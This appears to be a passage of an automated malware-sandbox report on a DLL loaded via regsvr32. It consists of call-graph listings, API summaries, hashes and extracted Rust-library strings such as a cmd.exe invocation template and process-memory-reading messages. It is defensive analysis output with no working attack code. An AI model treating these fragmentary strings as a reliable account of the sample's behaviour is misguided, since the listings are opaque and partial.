27113->27092 27114->27119 27115->27111 27116->27110 27117->27112 27118 7ffb98ffc910 HeapFree 27118->27119 27119->27118 27120 7ffb9907c23b 27119->27120 27140 7ffb990efde0 6 API calls 27119->27140 27122 7ffb98ffc910 HeapFree 27120->27122 27123 7ffb9907c257 27122->27123 27141 7ffb990efde0 6 API calls 27123->27141 27125 7ffb9907c25f 27125->27080 27127 7ffb990a3c9f 27126->27127 27128 7ffb990a3c65 27126->27128 27129 7ffb990cc040 68 API calls 27127->27129 27130 7ffb990a3caf 27127->27130 27128->27127 27128->27130 27131 7ffb98ffc900 4 API calls 27128->27131 27129->27130 27142 7ffb99072a50 27130->27142 27131->27127 27134 7ffb990a3d61 27136 7ffb9907be61 27134->27136 27138 7ffb98ffc910 HeapFree 27134->27138 27135 7ffb990a3d8c 27135->27136 27146 7ffb990698b0 68 API calls 27135->27146 27136->27095 27136->27100 27138->27136 27139->27100 27140->27119 27141->27125 27143 7ffb99072a80 27142->27143 27145 7ffb99072bc5 27143->27145 27147 7ffb99069bc0 68 API calls 27143->27147 27145->27134 27145->27135 27146->27136 27147->27145 27148->26603 27149->26480 27150->26486 27151->26488 27152->26494 27153->26492 27154->26501 27155->26499 27156->26498 27157->26499 27158->26500 27160 7ffb9901f8d0 27159->27160 27167 7ffb9901fb7c 27159->27167 27161 7ffb9901f4a0 262 API calls 27160->27161 27160->27167 27162 7ffb9901f93c 27161->27162 27163 7ffb9901fab1 27162->27163 27165 7ffb9901fa87 27162->27165 27173 7ffb9901f974 27162->27173 27164 7ffb9901fb2b 27163->27164 27166 7ffb9901faef 27163->27166 27163->27167 27164->26526 27165->27163 27168 7ffb98ffc910 HeapFree 27165->27168 27166->27164 27346 7ffb9900bc00 HeapFree 27166->27346 27176 7ffb9901fe8a 27167->27176 27347 7ffb9901f0a0 262 API calls 27167->27347 27168->27163 27169 7ffb99017600 3 API calls 27169->27173 27170 7ffb99017600 3 API calls 27174 7ffb9901f9f4 27170->27174 27173->27169 27173->27174 27177 7ffb98ffc910 HeapFree 27173->27177 27174->27163 27174->27170 27179 7ffb98ffc910 HeapFree 27174->27179 27175 7ffb9901fc5a 27178 7ffb9901fdbf 27175->27178 27181 7ffb9901fd95 27175->27181 27192 7ffb9901fc95 27175->27192 27194 7ffb990200bf 27176->27194 27351 7ffb9901b510 96 API calls 27176->27351 27177->27173 27178->27176 27180 7ffb9901fe39 27178->27180 27183 7ffb9901fdfd 27178->27183 27179->27174 27180->26526 27181->27178 27189 7ffb98ffc910 HeapFree 27181->27189 27183->27180 27350 7ffb9900bc00 HeapFree 27183->27350 27184 7ffb9901ff4c 27185 7ffb99020020 27184->27185 27186 7ffb9901fff6 27184->27186 27202 7ffb9901ff6b 27184->27202 27187 7ffb9902007c 27185->27187 27191 7ffb99020046 27185->27191 27185->27194 27186->27185 27196 7ffb98ffc910 HeapFree 27186->27196 27187->26526 27189->27178 27191->27187 27353 7ffb9900bc00 HeapFree 27191->27353 27195 7ffb9901fd15 27192->27195 27198 7ffb98ffc910 HeapFree 27192->27198 27348 7ffb990173c0 HeapFree 27192->27348 27197 7ffb9902015c 27194->27197 27204 7ffb99020405 27194->27204 27195->27178 27200 7ffb98ffc910 HeapFree 27195->27200 27349 7ffb990173c0 HeapFree 27195->27349 27196->27185 27354 7ffb9901e930 262 API calls 27197->27354 27198->27192 27200->27195 27202->27185 27207 7ffb98ffc910 HeapFree 27202->27207 27352 7ffb990173c0 HeapFree 27202->27352 27206 7ffb9902063e 27204->27206 27209 7ffb9901b760 130 API calls 27204->27209 27205 7ffb9902016e 27208 7ffb990202e5 27205->27208 27211 7ffb990202bb 27205->27211 27230 7ffb990201a6 27205->27230 27240 7ffb9902092d 27206->27240 27361 7ffb9901e930 262 API calls 27206->27361 27207->27202 27210 7ffb99020322 27208->27210 27357 7ffb990a6e50 WaitOnAddress GetLastError 27208->27357 27213 7ffb990204cc 27209->27213 27220 7ffb99020331 27210->27220 27358 7ffb99093910 70 API calls 27210->27358 27211->27208 27217 7ffb98ffc910 HeapFree 27211->27217 27215 7ffb9902059f 27213->27215 27219 7ffb99020575 27213->27219 27232 7ffb990204eb 27213->27232 27215->27206 27218 7ffb990205fb 27215->27218 27222 7ffb990205c5 27215->27222 27217->27208 27218->26526 27219->27215 27226 7ffb98ffc910 HeapFree 27219->27226 27224 7ffb9902035f 27220->27224 27359 7ffb99093910 70 API calls 27220->27359 27222->27218 27360 7ffb9900bc00 HeapFree 27222->27360 27223 7ffb99017600 3 API calls 27223->27232 27224->26526 27225 7ffb98ffc910 HeapFree 27225->27230 27226->27215 27228 7ffb98ffc910 HeapFree 27234 7ffb99020225 27228->27234 27230->27225 27230->27234 27355 7ffb990173c0 HeapFree 27230->27355 27232->27215 27232->27223 27236 7ffb98ffc910 HeapFree 27232->27236 27233 7ffb990206ec 27235 7ffb99020862 27233->27235 27238 7ffb99020838 27233->27238 27246 7ffb99020724 27233->27246 27234->27208 27234->27228 27356 7ffb990173c0 HeapFree 27234->27356 27237 7ffb990208dc 27235->27237 27239 7ffb990208a0 27235->27239 27235->27240 27236->27232 27237->26526 27238->27235 27242 7ffb98ffc910 HeapFree 27238->27242 27239->27237 27364 7ffb9900bc00 HeapFree 27239->27364 27252 7ffb99020abb 27240->27252 27365 7ffb9901ed40 262 API calls 27240->27365 27242->27235 27247 7ffb990207a5 27246->27247 27249 7ffb98ffc910 HeapFree 27246->27249 27362 7ffb990173c0 HeapFree 27246->27362 27247->27235 27250 7ffb98ffc910 HeapFree 27247->27250 27363 7ffb990173c0 HeapFree 27247->27363 27248 7ffb99020a29 27251 7ffb99020a84 27248->27251 27248->27252 27254 7ffb99020a4b 27248->27254 27249->27246 27250->27247 27251->26526 27256 7ffb99020b9c 27252->27256 27264 7ffb99020e44 27252->27264 27253 7ffb990209f9 27253->27248 27255 7ffb98ffc910 HeapFree 27253->27255 27254->27251 27366 7ffb9900bc00 HeapFree 27254->27366 27255->27248 27328 7ffb9901f4a0 27256->27328 27260 7ffb99020d24 27261 7ffb99020d61 27260->27261 27367 7ffb990a6e50 WaitOnAddress GetLastError 27260->27367 27270 7ffb99020d70 27261->27270 27368 7ffb99093910 70 API calls 27261->27368 27262 7ffb99020cfa 27262->27260 27267 7ffb98ffc910 HeapFree 27262->27267 27268 7ffb99020f15 27264->27268 27274 7ffb99021046 27264->27274 27266 7ffb99017600 3 API calls 27271 7ffb99020be6 27266->27271 27267->27260 27370 7ffb9901ed40 262 API calls 27268->27370 27277 7ffb99020d9e 27270->27277 27369 7ffb99093910 70 API calls 27270->27369 27271->27266 27273 7ffb99020c64 27271->27273 27276 7ffb98ffc910 HeapFree 27271->27276 27272 7ffb99017600 3 API calls 27272->27273 27273->27260 27273->27272 27280 7ffb98ffc910 HeapFree 27273->27280 27291 7ffb990211a3 27274->27291 27374 7ffb9901b3a0 96 API calls 27274->27374 27275 7ffb99020f4f 27279 7ffb99020f73 27275->27279 27371 7ffb990a6e50 WaitOnAddress GetLastError 27275->27371 27276->27271 27277->26526 27288 7ffb99020f82 27279->27288 27372 7ffb99093910 70 API calls 27279->27372 27280->27273 27282 7ffb99020f1f 27282->27275 27284 7ffb98ffc910 HeapFree 27282->27284 27284->27275 27285 7ffb99021124 27287 7ffb99021175 27285->27287 27290 7ffb9902113f 27285->27290 27285->27291 27287->26526 27294 7ffb99020fb0 27288->27294 27373 7ffb99093910 70 API calls 27288->27373 27289 7ffb990210f4 27289->27285 27292 7ffb98ffc910 HeapFree 27289->27292 27290->27287 27375 7ffb9900bc00 HeapFree 27290->27375 27293 7ffb9902123a 27291->27293 27298 7ffb990214e2 27291->27298 27292->27285 27376 7ffb9901f0a0 262 API calls 27293->27376 27294->26526 27324 7ffb990216cc 27298->27324 27382 7ffb9901bac0 262 API calls 27298->27382 27299 7ffb9902124c 27300 7ffb990213c2 27299->27300 27302 7ffb99021398 27299->27302 27312 7ffb99021287 27299->27312 27303 7ffb990213ff 27300->27303 27379 7ffb990a6e50 WaitOnAddress GetLastError 27300->27379 27302->27300 27307 7ffb98ffc910 HeapFree 27302->27307 27311 7ffb9902140e 27303->27311 27380 7ffb99093910 70 API calls 27303->27380 27304 7ffb990215a3 27308 7ffb99021646 27304->27308 27314 7ffb99021670 27304->27314 27320 7ffb990215c2 27304->27320 27307->27300 27308->27314 27318 7ffb98ffc910 HeapFree 27308->27318 27316 7ffb9902143c 27311->27316 27381 7ffb99093910 70 API calls 27311->27381 27313 7ffb99021305 27312->27313 27317 7ffb98ffc910 HeapFree 27312->27317 27377 7ffb990173c0 HeapFree 27312->27377 27313->27300 27321 7ffb98ffc910 HeapFree 27313->27321 27378 7ffb990173c0 HeapFree 27313->27378 27314->27324 27384 7ffb9900bc00 HeapFree 27314->27384 27316->26526 27317->27312 27318->27314 27320->27314 27323 7ffb98ffc910 HeapFree 27320->27323 27383 7ffb990173c0 HeapFree 27320->27383 27321->27313 27323->27320 27324->26526 27325->26526 27326->26526 27327->26526 27329 7ffb9901f758 27328->27329 27332 7ffb9901f558 27328->27332 27385 7ffb9900b0d0 90 API calls 27329->27385 27331 7ffb9901f769 27334 7ffb9901dfc0 130 API calls 27331->27334 27335 7ffb99049910 70 API calls 27332->27335 27337 7ffb9901f5d8 27332->27337 27333 7ffb9901b760 130 API calls 27343 7ffb9901f637 27333->27343 27336 7ffb9901f70c 27334->27336 27335->27337 27336->27260 27336->27262 27336->27271 27337->27333 27338 7ffb9900af10 90 API calls 27338->27343 27339 7ffb9901f6df 27339->27336 27386 7ffb9904a8d0 149 API calls 27339->27386 27341 7ffb9901f837 27342 7ffb9900b4a0 90 API calls 27342->27343 27343->27331 27343->27338 27343->27339 27343->27342 27344 7ffb9901f6e1 27343->27344 27344->27339 27345 7ffb99044aa0 262 API calls 27344->27345 27345->27339 27346->27164 27347->27175 27348->27192 27349->27195 27350->27180 27351->27184 27352->27202 27353->27187 27354->27205 27355->27230 27356->27234 27357->27210 27358->27220 27359->27220 27360->27218 27361->27233 27362->27246 27363->27247 27364->27237 27365->27253 27366->27251 27367->27261 27368->27270 27369->27270 27370->27282 27371->27279 27372->27288 27373->27288 27374->27289 27375->27287 27376->27299 27377->27312 27378->27313 27379->27303 27380->27311 27381->27311 27382->27304 27383->27320 27384->27324 27385->27331 27386->27341 27387->26532
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                                • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                                • API String ID: 3975177916-1077193248
                                                                                • Opcode ID: e8877b0d29b33cd03fe259f025adacbbc739ced8d1796b01c68c2241a0806bfd
                                                                                • Instruction ID: 448c7a60fea09a338c33b84d7b43bf2074297b3ccb88b6c3bb8a13fde09d2407
                                                                                • Opcode Fuzzy Hash: e8877b0d29b33cd03fe259f025adacbbc739ced8d1796b01c68c2241a0806bfd
                                                                                • Instruction Fuzzy Hash: ED73D3A2A09AD289EBB48F35D8043FE27A1FB15B88F505135CE6D5BB86DF39D641C340
                                                                                APIs
                                                                                Strings
                                                                                • ), xrefs: 00007FFB9901251B
                                                                                • Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs, xrefs: 00007FFB9901250F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryRead$InformationTimesToken$HeapQuery$AllocCloseCountersErrorFileHandleLastModuleNameOpenSystemVirtualmemcpymemset
                                                                                • String ID: )$Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs
                                                                                • API String ID: 2429014559-2122791606
                                                                                • Opcode ID: f7f2dfa0bfeee887a9a58c51f0b83762a470b589c1058d6d2acb4d121fd7d8b5
                                                                                • Instruction ID: 2dab7277b1424de834f13dc4419000b9411e03e385e6602e84ebff9b7d405236
                                                                                • Opcode Fuzzy Hash: f7f2dfa0bfeee887a9a58c51f0b83762a470b589c1058d6d2acb4d121fd7d8b5
                                                                                • Instruction Fuzzy Hash: C39291A2A08B8381EAF49F35E4403FA67A0FB84784F448535DAAD57B95DF3CE595CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHeapLastmemcpy$AllocCreateFreeMutexmemcmp
                                                                                • String ID: $Failed to execute command$[_^A^$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$not yet implemented$tz%
                                                                                • API String ID: 1612371893-4145309991
                                                                                • Opcode ID: 306804f8429946d84fd0d9c0b38720407107e4c4edf45aaf09ab6711b3670113
                                                                                • Instruction ID: 6a3e1e4e53bcde3c027958db164ca81588d620936c68dbec0e7ed54c3d3705a3
                                                                                • Opcode Fuzzy Hash: 306804f8429946d84fd0d9c0b38720407107e4c4edf45aaf09ab6711b3670113
                                                                                • Instruction Fuzzy Hash: 38C27AB261CB9280EB709B21E0403EAB7A1FB85B84F945536DE8D07B99DF3DE145CB44
                                                                                APIs
                                                                                Strings
                                                                                • 0x0o0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FFB990EADF1, 00007FFB990EAEA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$GlobalInfoMemoryPerformanceStatus
                                                                                • String ID: 0x0o0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                • API String ID: 4293763300-3431789093
                                                                                • Opcode ID: 926480860362c9b0ba195ff6333f0d8137a941f52978fb87594afb95eac167be
                                                                                • Instruction ID: f374402df96428e9f296d8ec7996da1ddf603b603640599a860ce6d123ad3532
                                                                                • Opcode Fuzzy Hash: 926480860362c9b0ba195ff6333f0d8137a941f52978fb87594afb95eac167be
                                                                                • Instruction Fuzzy Hash: E7E212B2B1864381EB709B36E0017BA6750BF85BD4F946A35EE8D07799DF3DE2448708

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2406 7ffb9909ba70-7ffb9909bad8 call 7ffb990ef61c 2409 7ffb9909bae0-7ffb9909baf2 GetCurrentProcessId 2406->2409 2410 7ffb9909baf4 2409->2410 2411 7ffb9909bb28-7ffb9909bba7 call 7ffb990cd5a0 2409->2411 2413 7ffb9909bb00-7ffb9909bb26 ProcessPrng 2410->2413 2415 7ffb9909bba9-7ffb9909bbb9 call 7ffb98ffc910 2411->2415 2416 7ffb9909bbbe-7ffb9909bbe8 2411->2416 2413->2411 2413->2413 2415->2416 2418 7ffb9909bbea-7ffb9909bbf0 2416->2418 2419 7ffb9909bc00-7ffb9909bc1b 2416->2419 2420 7ffb9909bc20-7ffb9909bc31 2418->2420 2421 7ffb9909bbf2-7ffb9909bbf9 2418->2421 2422 7ffb9909bcd5-7ffb9909bcf5 call 7ffb98ffc900 2419->2422 2425 7ffb9909bc33-7ffb9909bc42 2420->2425 2426 7ffb9909bc72-7ffb9909bc7a 2420->2426 2424 7ffb9909bc7d-7ffb9909bc82 2421->2424 2433 7ffb9909c147-7ffb9909c14f call 7ffb990cc040 2422->2433 2434 7ffb9909bcfb-7ffb9909bd15 2422->2434 2430 7ffb9909bc84-7ffb9909bcc4 2424->2430 2428 7ffb9909bf96-7ffb9909bfa8 2425->2428 2429 7ffb9909bc48-7ffb9909bc6b 2425->2429 2426->2424 2428->2424 2435 7ffb9909bfae-7ffb9909bfd7 2428->2435 2429->2424 2436 7ffb9909bc6d 2429->2436 2431 7ffb9909c144 2430->2431 2432 7ffb9909bcca-7ffb9909bcd1 2430->2432 2431->2433 2432->2422 2439 7ffb9909c154-7ffb9909c15d 2433->2439 2438 7ffb9909bd30-7ffb9909bd33 2434->2438 2435->2430 2436->2435 2440 7ffb9909bd35-7ffb9909bd38 2438->2440 2441 7ffb9909bd90-7ffb9909bd95 2438->2441 2444 7ffb9909c15f 2439->2444 2445 7ffb9909c182-7ffb9909c192 2439->2445 2446 7ffb9909bd3a-7ffb9909bd3c 2440->2446 2447 7ffb9909bd70-7ffb9909bd74 2440->2447 2442 7ffb9909bd9b-7ffb9909bdae 2441->2442 2443 7ffb9909bef0-7ffb9909bf30 call 7ffb990ef5ac 2441->2443 2448 7ffb9909be20-7ffb9909be25 2442->2448 2449 7ffb9909bdb0-7ffb9909bdb7 2442->2449 2469 7ffb9909bf36-7ffb9909bf41 GetLastError 2443->2469 2470 7ffb9909c050-7ffb9909c053 2443->2470 2450 7ffb9909c1ac-7ffb9909c20f call 7ffb990efde0 ReadFileEx 2444->2450 2451 7ffb9909c194-7ffb9909c19a call 7ffb98ffc910 2445->2451 2452 7ffb9909c19f-7ffb9909c1a2 2445->2452 2454 7ffb9909bd3e-7ffb9909bd41 2446->2454 2447->2441 2455 7ffb9909bd76-7ffb9909bd7d 2447->2455 2459 7ffb9909bd25-7ffb9909bd2d 2448->2459 2456 7ffb9909c124 2449->2456 2457 7ffb9909bdbd-7ffb9909bdd3 2449->2457 2482 7ffb9909c252-7ffb9909c261 GetLastError 2450->2482 2483 7ffb9909c211 2450->2483 2451->2452 2452->2450 2460 7ffb9909c1a4-7ffb9909c1a7 CloseHandle 2452->2460 2463 7ffb9909bd43-7ffb9909bd6e 2454->2463 2464 7ffb9909bd20-7ffb9909bd23 2454->2464 2465 7ffb9909bd83-7ffb9909bd8a 2455->2465 2466 7ffb9909be5a-7ffb9909be6a 2455->2466 2471 7ffb9909c139-7ffb9909c142 call 7ffb990cc040 2456->2471 2467 7ffb9909bdd5 2457->2467 2468 7ffb9909bddb-7ffb9909bdde 2457->2468 2459->2438 2460->2450 2463->2449 2464->2459 2465->2454 2473 7ffb9909bea7-7ffb9909beb0 2466->2473 2474 7ffb9909be6c-7ffb9909be7c 2466->2474 2467->2468 2468->2456 2479 7ffb9909bde4-7ffb9909bdf9 2468->2479 2480 7ffb9909bf47-7ffb9909bf4a 2469->2480 2481 7ffb9909bfdc-7ffb9909bff6 2469->2481 2475 7ffb9909c055-7ffb9909c064 call 7ffb98ffc910 2470->2475 2476 7ffb9909c069-7ffb9909c0c2 call 7ffb99095ae0 2470->2476 2471->2439 2477 7ffb9909beb7-7ffb9909bec6 2473->2477 2474->2477 2478 7ffb9909be7e-7ffb9909be9e 2474->2478 2475->2476 2499 7ffb9909c0c7-7ffb9909c0ca 2476->2499 2486 7ffb9909bec8-7ffb9909bee5 2477->2486 2487 7ffb9909bea0 2477->2487 2478->2486 2478->2487 2479->2471 2490 7ffb9909bdff-7ffb9909be0f 2479->2490 2493 7ffb9909bf4c-7ffb9909bf52 2480->2493 2494 7ffb9909bf60-7ffb9909bf63 2480->2494 2491 7ffb9909bff8-7ffb9909c007 call 7ffb98ffc910 2481->2491 2492 7ffb9909c00c-7ffb9909c013 2481->2492 2488 7ffb9909c264-7ffb9909c270 2482->2488 2495 7ffb9909c220-7ffb9909c233 SleepEx 2483->2495 2486->2443 2487->2473 2497 7ffb9909c284-7ffb9909c290 2488->2497 2498 7ffb9909c272-7ffb9909c282 call 7ffb990a3a80 2488->2498 2500 7ffb9909be2a 2490->2500 2501 7ffb9909be11-7ffb9909be1e 2490->2501 2491->2492 2503 7ffb9909c015-7ffb9909c022 call 7ffb98ffc910 2492->2503 2504 7ffb9909c027-7ffb9909c02b 2492->2504 2505 7ffb9909bf6d-7ffb9909bf77 2493->2505 2494->2481 2506 7ffb9909bf65-7ffb9909bf6b 2494->2506 2495->2495 2507 7ffb9909c235-7ffb9909c24c 2495->2507 2517 7ffb9909c294-7ffb9909c2a0 2497->2517 2498->2517 2515 7ffb9909c0cc-7ffb9909c0e2 2499->2515 2516 7ffb9909c0ed-7ffb9909c107 2499->2516 2509 7ffb9909be2c-7ffb9909be45 call 7ffb99068fb0 2500->2509 2501->2509 2503->2504 2511 7ffb9909c035-7ffb9909c04f 2504->2511 2512 7ffb9909c02d-7ffb9909c030 CloseHandle 2504->2512 2505->2409 2508 7ffb9909bf7d-7ffb9909bf91 call 7ffb98ffc910 2505->2508 2506->2481 2506->2505 2507->2488 2513 7ffb9909c24e-7ffb9909c250 2507->2513 2508->2409 2527 7ffb9909c126-7ffb9909c135 2509->2527 2528 7ffb9909be4b-7ffb9909be55 2509->2528 2512->2511 2513->2517 2515->2503 2520 7ffb9909c0e8 2515->2520 2516->2511 2521 7ffb9909c10d-7ffb9909c11f call 7ffb98ffc910 2516->2521 2520->2504 2521->2511 2527->2471 2528->2459
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentPrng
                                                                                • String ID:
                                                                                • API String ID: 716580790-0
                                                                                • Opcode ID: 9a63dd73fd40b28bc31c2260c1820278c048a26c35a56022da1d8901d8f0caa1
                                                                                • Instruction ID: d8bfc6b6f05b51c524cd4ec70df3f64cd7a3e56e337e4faf30406ca42e16b0cd
                                                                                • Opcode Fuzzy Hash: 9a63dd73fd40b28bc31c2260c1820278c048a26c35a56022da1d8901d8f0caa1
                                                                                • Instruction Fuzzy Hash: 8122D5B2E05AA28AFBB48F35D8113B92B91FB447A8F144635EA6E477C6DF3DD5418300

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2529 7ffb98ffd2b0-7ffb98ffd2c8 2530 7ffb98ffdab9-7ffb98ffdacc 2529->2530 2531 7ffb98ffd2ce-7ffb98ffd31e call 7ffb99030cd0 GetSystemInfo 2529->2531 2534 7ffb98ffd324-7ffb98ffd342 call 7ffb98ffc900 2531->2534 2535 7ffb98ffd4f1-7ffb98ffd4f9 2531->2535 2540 7ffb98ffd348-7ffb98ffd36a 2534->2540 2541 7ffb98ffdb10-7ffb98ffdb1a call 7ffb990cc040 2534->2541 2537 7ffb98ffd576-7ffb98ffd5a4 call 7ffb98ffc900 2535->2537 2545 7ffb98ffd5aa-7ffb98ffd5f1 call 7ffb98ffdc60 * 3 2537->2545 2546 7ffb98ffdb01-7ffb98ffdb0b call 7ffb990cc040 2537->2546 2544 7ffb98ffd370-7ffb98ffd394 2540->2544 2548 7ffb98ffdb1f-7ffb98ffdb29 call 7ffb990cc040 2541->2548 2549 7ffb98ffd396-7ffb98ffd39b call 7ffb99002af0 2544->2549 2550 7ffb98ffd3a0-7ffb98ffd3c8 2544->2550 2573 7ffb98ffd5f3-7ffb98ffd5f5 2545->2573 2574 7ffb98ffd60e-7ffb98ffd623 call 7ffb990df920 2545->2574 2546->2541 2557 7ffb98ffdb2e 2548->2557 2549->2550 2554 7ffb98ffd3ca-7ffb98ffd3d0 2550->2554 2555 7ffb98ffd3d2-7ffb98ffd3ef call 7ffb98ffc900 2550->2555 2554->2544 2554->2555 2555->2548 2564 7ffb98ffd3f5-7ffb98ffd415 2555->2564 2560 7ffb98ffdb31-7ffb98ffdb37 call 7ffb990cc040 2557->2560 2566 7ffb98ffdb3c-7ffb98ffdb44 call 7ffb990cc040 2560->2566 2567 7ffb98ffd4fb-7ffb98ffd506 2564->2567 2568 7ffb98ffd41b-7ffb98ffd455 call 7ffb98ffdc60 * 4 2564->2568 2576 7ffb98ffdb49-7ffb98ffdb56 call 7ffb990df620 2566->2576 2570 7ffb98ffd518-7ffb98ffd530 call 7ffb990df920 2567->2570 2630 7ffb98ffd4ba-7ffb98ffd4cd 2568->2630 2631 7ffb98ffd457-7ffb98ffd46a 2568->2631 2591 7ffb98ffd536-7ffb98ffd546 2570->2591 2592 7ffb98ffd6c3-7ffb98ffd6ce 2570->2592 2579 7ffb98ffd600-7ffb98ffd604 